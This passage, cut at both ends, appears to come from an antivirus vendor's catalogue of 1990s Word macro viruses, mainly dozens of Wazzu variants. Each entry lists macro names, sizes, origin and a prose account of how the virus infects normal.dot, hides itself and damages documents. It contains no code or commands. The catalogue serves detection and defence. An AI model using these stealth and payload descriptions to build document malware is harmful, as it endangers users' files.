with a simple signature or with exact CRC detection. UglyKid.A uses "ToolsMacro" to make recognition of an infected document more difficult (called macro stealth technique). It also removes the File|Templates menu item so users can not look for viral macros on an infected system. It is advised not to select the "ToolsMacro" menu item, since it is used to execute the virus code. UglyKid.A also infects further documents when the "FileSave" command is used. While most other Polymorphic viruses are fairly slow and visible to the user, UglyKid.A tries to hide the macro editing bar. Instead it shows a gray bar for a very short time. The payload of UglyKid.A changes the "User Info" item in the Tool|Option menu. It adds the following comments: " Name: Nasty " " Initial: Ugly " In order to detect UglyKid.A, we advise to use an anti-virus program that does smart checksumming. [WORD_Wallpaper.A] Virus name: WORD_Wallpaper.A Virus Type: Word macro virus Number of macros: 2 (or 5) Encrypted: No Macro names: AutoOpen, FilePrint (ToolsMacro, FileTemplates ToolsCustomize) Size of macros: 7353 Bytes in documents 29088 Bytes in global template Place of origin: Unknown Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: No Description: Wallpaper.A infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened (AutoOpen) or one of the following menu items is selected: FilePrint FileTemplates ToolsMacro ToolsCustomize Wallpaper uses FileTemplate, ToolsCustomize and ToolsMacro to make recognition of an infected document more difficult (called macro stealth technique). On the 31st of each month, Wallpaper drops an image of a dead head (SK2.BMP). It then modifies AUTOEXEC.BAT and WIN.INI in order to change the background image of Windows. The following file is also created in the C:\WINDOWS directory: " REGSK2.REG " Wallpaper also shows the following message on the 31st of each month: " [!!!PIRATE VIRUS!!!]--Active! The [PIRATE VIRUS] has pillaged " " your computer! GO BACK TO MS-WORD?? " [WORD_Weather.A:Tw (aka Fish)] Virus name: WORD_Weather.A:Tw (aka Fish) Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: AutoOpen, AutoNew, AutoExec,ToolsMacro Size of macros: 4849 Bytes Place of origin: Taiwan Date of origin: 1996 Payload: Yes Seen In-The-Wild: Yes Description: Weather.A activates when an infected document is opened. It then displays a message and asks for user input. To continue working, the user has to input the right answer. It uses "ToolsMacro" to make recognition of an infected document more difficult (called macro stealth technique). Weather uses language specific commands, therefore it only works with the Chinese/Taiwanese version of Microsoft WORD_ [WORD_Wazzu.A] Virus name: WORD_Wazzu.A Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 632 Bytes Place of origin: Washington, USA Date of origin: Posted to Usenet in April 1996 Destructive: Yes Common In-The-Wild: Yes Description: When an infected document is opened, Wazzu.A checks the name of the active document. If it is "normal.dot", then the virus macro is copied from the global template to the open document. Otherwise normal.dot becomes infected. Wazzu does not check if a document is already infected. It simply overwrites the "autoopen" macro. Wazzu has a destructive payload. It picks a random number between 0 and 1 and if the number is smaller than 0.2 (probability of 20 percent), the virus will move a word from one place in the document to another. This is repeated three times. So the probability for a Word to be moved is 48.8 percent. After the third time, Wazzu picks a final random number (between 0 and 1) and if the value is larger than 0.25 (probability of 25 percent), the word "Wazzu" will be inserted into the document. After an infected documents is cleaned, it has to be checked carefully because chances of having a modified document (words swapped or added) are over 61 percent. This can be a very time consuming job with large documents. Wazzu is a nickname for the Washington State University. Wazzu.A has also been convert to the Word97 Word format (Word8). [WORD8_Wazzu.A] Virus name: WORD_Wazzu.A Virus Type: Word macro virus Platform: Office 97 Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 632 Bytes Place of origin: Washington, USA Date of origin: Posted to Usenet in April 1996 Destructive: Yes Common In-The-Wild: Yes Description: When an infected document is opened, Wazzu.A checks the name of the active document. If it is "normal.dot", then the virus macro is copied from the global template to the open document. Otherwise normal.dot becomes infected. Wazzu does not check if a document is already infected. It simply overwrites the "autoopen" macro. Wazzu has a destructive payload. It picks a random number between 0 and 1 and if the number is smaller than 0.2 (probability of 20 percent), the virus will move a word from one place in the document to another. This is repeated three times. So the probability for a Word to be moved is 48.8 percent. After the third time, Wazzu picks a final random number (between 0 and 1) and if the value is larger than 0.25 (probability of 25 percent), the word "Wazzu" will be inserted into the document. After an infected documents is cleaned, it has to be checked carefully because chances of having a modified document (words swapped or added) are over 61 percent. This can be a very time consuming job with large documents. Wazzu is a nickname for the Washington State University. [WORD8_Wazzu.A2] Virus name: WORD_Wazzu.A2 Virus Type: Word macro virus Platform: Office 97 Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 632 Bytes Place of origin: Washington, USA Date of origin: Posted to Usenet in April 1996 Destructive: Yes Common In-The-Wild: Yes Description: When an infected document is opened, Wazzu.A checks the name of the active document. If it is "normal.dot", then the virus macro is copied from the global template to the open document. Otherwise normal.dot becomes infected. Wazzu does not check if a document is already infected. It simply overwrites the "autoopen" macro. Wazzu has a destructive payload. It picks a random number between 0 and 1 and if the number is smaller than 0.2 (probability of 20 percent), the virus will move a word from one place in the document to another. This is repeated three times. So the probability for a Word to be moved is 48.8 percent. After the third time, Wazzu picks a final random number (between 0 and 1) and if the value is larger than 0.25 (probability of 25 percent), the word "Wazzu" will be inserted into the document. After an infected documents is cleaned, it has to be checked carefully because chances of having a modified document (words swapped or added) are over 61 percent. This can be a very time consuming job with large documents. Wazzu is a nickname for the Washington State University. [WORD_Wazzu.AA] Virus name: WORD_Wazzu.AA Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 1624 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: No Common In-The-Wild: No Description: The difference between this new variant and the original Wazzu.A virus is that Wazzu.AA does not add the word "wazzu" to newly opened documents. Wazzu.AA infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.AB] Virus name: WORD_Wazzu.AB Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 323 Bytes Place of origin: Australia Date of origin: February 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AB is another "do-nothing" macro virus with no payload and some modified codes. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.AC] Virus name: WORD_Wazzu.AC Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 433 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AC is another "do-nothing" macro virus with some code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.AD] Virus name: WORD_Wazzu.AD Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 332 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AD is another "do-nothing" macro virus with some code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.AE] Virus name: WORD_Wazzu.AE Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 618 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AE has a slightly modified code. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). The payload is similar to the original Wazzu virus. There is a 3/5 chance that one word is moved to another position in the active document. [WORD_Wazzu.AF] Virus name: WORD_Wazzu.AF Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 1484 Bytes Place of origin: USA Date of origin: December 1996 Destructive: No Common In-The-Wild: No Description: Wazzu.AF is a new variant based on the older Wazzu.D virus. The only difference between the two viruses is that the first blank line has been deleted. For more information, please refer to the Wazzu.D virus description. [WORD_Wazzu.AG] Virus name: WORD_Wazzu.AG Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 332 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AG is another "do-nothing" macro virus with some code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.AH] Virus name: WORD_Wazzu.AH Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 557 Bytes Place of origin: USA Date of origin: February 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AH has some code modifications. Its payload inserts the word "YaHoo" instead of "wazzu". The second payload, which moves words from one position to another, is similar to Wazzu.A. Wazzu.AH infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.AI] Virus name: WORD_Wazzu.AI Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 794 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AI is another "do-nothing" macro virus with some code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.AJ] Virus name: WORD_Wazzu.AJ Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 430 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AJ is another "do-nothing" macro virus with some code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.AK] Virus name: WORD_Wazzu.AK Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: autoOpen Size of macros: 344 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AK is another "do-nothing" macro virus with code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.AL] Virus name: WORD_Wazzu.AL Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 643 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AL has a slightly modified code. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). The payload is similar to the original Wazzu virus. For additional information, please refer to the Wazzu.A virus description. [WORD_Wazzu.AM] Virus name: WORD_Wazzu.AM Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 606 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AM has a slightly modified code. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). The payload is similar to the original Wazzu virus. There is a 3/5 chance that one word is moved to another position in the active document. [WORD_Wazzu.AN] Virus name: WORD_Wazzu.AN Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 375 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AN is another "do-nothing" macro virus with some code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). It also contains the following comment in its code: " REM This macro wipes out the Wazzu Virus! " [WORD_Wazzu.AO] Virus name: WORD_Wazzu.AO Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 626 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AO has a slightly modified code. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). The payload is similar to the original Wazzu virus. For additional information, please refer to the Wazzu.A virus description. [WORD_Wazzu.AP] Virus name: WORD_Wazzu.AP Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: autoOpen Size of macros: 432 Bytes Place of origin: USA Date of origin: February 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AP is another "do-nothing" macro virus with some code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.AQ] Virus name: WORD_Wazzu.AQ Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: autoOpen Size of macros: 437 Bytes Place of origin: USA Date of origin: February 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AQ is another "do-nothing" macro virus with a corrupted payload and some missing commands. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.AR] Virus name: WORD_Wazzu.AR Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: autoOpen Size of macros: 563 Bytes Place of origin: Germany Date of origin: February 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AR has a slightly modified code. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). The payload is similar to the original Wazzu virus. For more information, please refer to the Wazzu.A virus description. [WORD_Wazzu.AS] Virus name: WORD_Wazzu.AS Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 352 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and Wazzu.L is that Wazzu.AS has some modified codes. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). When a user opens a document, Wazzu.AS adds the following text at the end of the document: " ladderwork! " [WORD_Wazzu.AT] Virus name: WORD_Wazzu.AT Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 576 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AT has a slightly modified code. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). The payload is similar to the original Wazzu virus. There is a 3/5 chance that one word is moved to another position in the active document. [WORD_Wazzu.AU] Virus name: WORD_Wazzu.AU Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 630 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AU has a slightly modified code. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). The payload is similar to the original Wazzu virus. For additional information, please refer to the Wazzu.A virus description. [WORD_Wazzu.AV] Virus name: WORD_Wazzu.AV Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 321 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AV is another "do-nothing" macro virus with small code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.AW] Virus name: WORD_Wazzu.AW Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1135 Bytes Place of origin: USA Date of origin: February 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AW is a combination of the Wazzu virus and the ShareFun virus. It contains payloads from both viruses. Wazzu.AW moves words from one place to another, it enters the word "wazzu" to the active document, and tries to mail an infected document (C:\doc1.doc) to 3 randomly chosen addresses from the MS Mail address book. For further details, please refer to the Wazzu.A and Sharefun.A virus description. [WORD_Wazzu.AX] Virus name: WORD_Wazzu.AX Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 343 Bytes Place of origin: USA Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AX is another "do-nothing" macro virus with small code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.AY] Virus name: WORD_Wazzu.AY Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 632 Bytes Place of origin: Unknown Date of origin: February 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AY is another "do-nothing" macro virus with a corrupted payload and a 2-byte code modification. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.AZ] Virus name: WORD_Wazzu.AZ Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoClose Size of macros: 659 Bytes Place of origin: USA Date of origin: February 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.AZ has some code modifications. Its payload inserts the word "uzzaw" (wazzu backwards). Wazzu.AZ also uses the "AutoClose" macro instead of "AutoOpen". It infects the global template when an infected document is closed. Further documents become infected when they are also closed (AutoClose). [WORD_Wazzu.B] Virus name: WORD_Wazzu.B Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 697 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: Yes Common In-The-Wild: No Description: The difference between this new variant and the original Wazzu.A virus is that Wazzu.B has an additional, unimportant, virus comment. For more information, please refer to the Wazzu.A virus description. [WORD_Wazzu.BA] Virus name: WORD_Wazzu.BA Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoClose Size of macros: 277 Bytes Place of origin: USA Date of origin: February 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BA has a slightly modified code with no payload. It also uses the "AutoClose" macro instead of "AutoOpen". It infects the global template when an infected document is closed. Further documents become infected when they are also closed (AutoClose). [WORD_Wazzu.BB] Virus name: WORD_Wazzu.BB Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 434 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BB is another "do-nothing" macro virus with small code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BC] Virus name: WORD_Wazzu.BC Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 862 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BC targets an anti-virus program in its payload. It renames the default directory of VET (Australian product). Wazzu.BC also contains other payloads where it moves words and enters the following words to newly opened documents: (probability differs in each case) " waffle " " zoom " " kill " " mum " Wazzu.BC infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BD] Virus name: WORD_Wazzu.BD Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 525 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BD selects all text of a newly opened document and then deletes it. Recovery is impossible since Wazzu.BD also removes the EDIT|EDITUNDO menu item. This payload triggers with a chance of 1/50. Wazzu.BD also shows the following message: " Where do you want to go today " Wazzu.BD infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BE] Virus name: WORD_Wazzu.BE Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 439 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BE shows the following message during infection: " Wazzu n'est pas mort " Wazzu.BE infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BF] Virus name: WORD_Wazzu.BF Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 334 Bytes Place of origin: USA Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BF is another "do-nothing" macro virus with small code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BG] Virus name: WORD_Wazzu.BG Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 432 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BG is another "do-nothing" macro virus with no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BH] Virus name: WORD_Wazzu.BH Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 472 Bytes Place of origin: Unknown Date of origin: Spring 1997 Payload: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BH tries to remove all text from a newly opened document. It does not remove the "Edit|Undo" option, thus users can recover after the text disappears. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BI] Virus name: WORD_Wazzu.BI Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 361 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BI is another "do-nothing" macro virus with some code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BJ] Virus name: WORD_Wazzu.BJ Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 299 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BJ is another "do-nothing" macro virus with some code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BK] Virus name: WORD_Wazzu.BK Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 623 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BK has a slightly modified code. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). The payload is similar to the original Wazzu virus. For additional information, please refer to the Wazzu.A virus description. [WORD_Wazzu.BL] Virus name: WORD_Wazzu.BL Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 678 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BL has a slightly modified code. It infects the global template when an infected document is opened. After infection of the global template, it fails to infect other documents. Therefore, it is not likely to survive in the wild. [WORD_Wazzu.BM] Virus name: WORD_Wazzu.BM Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 296 Bytes Place of origin: USA Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BM is another "do-nothing" macro virus with modified codes and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BN] Virus name: WORD_Wazzu.BN Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 433 Bytes Place of origin: Germany Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BN is another "do-nothing" macro virus with modified codes and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BO] Virus name: WORD_Wazzu.BO Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 632 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BO has a slightly corrupted code. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). The payload is similar to the original Wazzu virus. There is a 3/5 chance that one word is moved to another position in the active document. [WORD_Wazzu.BP] Virus name: WORD_Wazzu.BP Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 289 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BP displays the following message: " Leaving Traces of Wazzu Around the World... " Wazzu.BP infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BQ] Virus name: WORD_Wazzu.BQ Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 670 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BQ has a slightly modified code. It contains one additional virus author comment. Wazzu.BQ infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). The payload is similar to the original Wazzu virus. For additional information, please refer to the Wazzu.A virus description. [WORD_Wazzu.BR] Virus name: WORD_Wazzu.BR Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 332 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BR is another "do-nothing" macro virus with some code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BS] Virus name: WORD_Wazzu.BS Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 605 Bytes Place of origin: France Date of origin: Spring 1997 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BS replaces the word "donc" with the following: " Mon prof est con, " This occurs when a document is opened (probability: 3/4). The second payload is similar to Wazzu.A, where one word is moved from one position to another. For further details, please refer to the Wazzu.A virus description. Wazzu.BS infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BU] Virus name: WORD_Wazzu.BU Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 148 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BU is another "do-nothing" macro virus with some code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BV] Virus name: WORD_Wazzu.BV Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 152 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BV is another "do-nothing" macro virus with some code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BW] Virus name: WORD_Wazzu.BW Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 158 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BW is another "do-nothing" macro virus with some code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BX] Virus name: WORD_Wazzu.BX Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 345 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BX is another "do-nothing" macro virus with some code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.BY] Virus name: WORD_Wazzu.BY Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 277 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.BY is another "do-nothing" macro virus with some code modifications and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.C] Virus name: WORD_Wazzu.C Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: autoOpen Size of macros: 433 Bytes Place of origin: Unknown Date of origin: Summer 1996 Destructive: No Common In-The-Wild: Yes Description: The difference between this new variant and the original Wazzu.A virus is that Wazzu.C does not have any destructive payload. It is only infectious. During the Spring of 1997, Wazzu.C was discovered in a Word97 document (Word8). [WORD_Wazzu.CB] Virus name: WORD_Wazzu.CB Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 343 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and previous Wazzu viruses is that Wazzu.CB is another "do-nothing" macro virus with some corrupted codes and no payload. It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Wazzu.D] Virus name: WORD_Wazzu.D Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: autoOpen Size of macros: 331 Bytes Place of origin: Unknown Date of origin: Summer 1996 Destructive: No Common In-The-Wild: No Description: The difference between this new variant and Wazzu.C is that some unused codes are missing in Wazzu.D. The difference to the original Wazzu is that it does not contain any destructive payload, such as changing documents. Wazzu.D is only infectious. [WORD_Wazzu.E] Virus name: WORD_Wazzu.E Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: autoOpen Size of macros: 318 Bytes Place of origin: Unknown Date of origin: September 1996 